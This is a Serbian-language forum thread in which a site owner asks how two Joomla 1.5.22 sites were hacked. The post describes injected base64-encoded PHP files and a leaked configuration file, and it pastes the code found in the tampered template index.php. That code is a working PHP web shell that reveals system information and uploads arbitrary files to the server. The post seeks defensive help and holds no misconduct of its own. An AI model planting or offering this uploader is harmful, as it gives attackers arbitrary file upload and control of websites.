U toku zdnjih 3 dana dvaput mi je hakovan joomla sajt, dva razlicita.Steta nije velika samo je promenjen index.php file, ali mi nije jasno kako su to uradili.
Naime na serveru su ubacili php skriptu tipa webadmin.php i preko nje modifikovali index.php.Po datumu modifikacije video sam samo dva sajta.
Sada je to malo drugacije.
Skripta je eval("?>".base64_decode je kodirana i ima vise inficiranih fajlova TMP folder je pun nekih php fajlova , svi su kodirani i templates folder je modifikovan defult templates.
Da li bi neko znao kako su ubacili ove fajlove na hosting, posto neverujem da su mi probili sifru.Joomla je bila 15.22 nisam je updateovao da nije mozda preko nje?

Svaka informacija bi mi bila korisna kako ne bi ponovo doslo do slicnih situacija

Sad sam primetio jos nesto zanimljivo ali totalno nejasno.
Medju fajlovima sa ovog drugog sajta koji su mi hakovali, nasao sam fajl pod imenom es.txt.

koji je ustvari configuration.php sa mog prvog hakovanog sajta, i se.txt koji je sa necijeg tudjeg a ne mog sajta , tako da sad posedujem parametre od tog sajta kod mene na serveru.
mislim ludilo.
valjda neko zna foru na koju rade

Samo da dodam , fajlove koje sam malopre pomenuo vidim preko njihove webadmin skripte, a preko mog fajl menadzera ne i preko filezile sam probao ali ih nevidim.
B   0 / ?--------- / root
velicini fajla prikazuje kao B a ovaj upitnik je chmod

Ili je joomla ili neki plugin busan.. ili postoji problem na nivou celog hosta

Moram da postujem i ovo
Ovo sam naso u defult joomla template, izmenjen je index.php
ovo je kod

<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post"

enctype="multipart/form-data" name="uploader"

id="uploader">';
echo '<input type="file" name="file" size="50"><input

name="_upl" type="submit" id="_upl"

value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
   if(@copy($_FILES['file']['tmp_name'],

$_FILES['file']['name'])) { echo '<b>usta upload basarili

</b><br><br>'; }
   else { echo '<b>usta upload basarili

olmadi.Baska siteye dal!!</b><br><br>'; }
}
?>

Koliko se secam, Joomla! sama ne moze da menja index.php. Ako sam u tome u pravu, verovatno ti je provaljen FTP nalog. Koji je hosting u pitanju?